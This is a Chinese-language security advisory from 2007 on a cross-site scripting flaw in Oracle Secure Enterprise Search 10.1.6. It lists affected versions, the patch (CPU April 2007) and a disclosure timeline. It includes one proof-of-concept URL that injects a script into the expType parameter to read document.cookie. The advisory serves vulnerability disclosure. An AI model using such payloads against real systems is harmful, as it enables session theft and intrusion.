当前位置: 安全纵横 > 安全公告

Oracle企业安全搜索(SES)存在跨站脚本漏洞

名称:Oracle企业安全搜索(SES)存在跨站脚本漏洞

相关系统:Oracle Secure Enterprise Search 10.1.6-SES

严重程度:中等风险 类别:跨站点脚本(XSS/CSS)

厂商URL: http://www.oracle.com/

作者:Alexander Kornbrust (ak ata dbappsecurity.com) CVE

日期:2007-4-17 (V 1.00)

详细资料: Oracle Secure Enterprise Search 10g 是Oracle的一个独立产品,用于实现企业所有信息资产安全、高效、易用的搜索。在boundary_rules.jsp中的EXPTYPE参数可能导致跨站脚本漏洞。

使用:

http://www.red-database-security.com:7777/search/admin/sources/boundary_rules.jsp?
event=deleteIncludeRule&p_src=web&p_mode=edit&p_id=3&pattern=
www.red-database-security.com&expType=%3Cscript%3Ealert(document.cookie)%3C/
script%3ECC_SIMPLE_INCLUSION'

相关产品: Oracle Enterprise Search ﹤10.1.8

补丁信息: 请升级到SES的最新版本或者使用CPU April 2007.

历史:

2005-4-5 发出Oracle 安全警告

2005-4-6 确认缺陷

2007-4-17 发布CPU April 2007

2007-4-17 Red-Database-Security 发布这项报告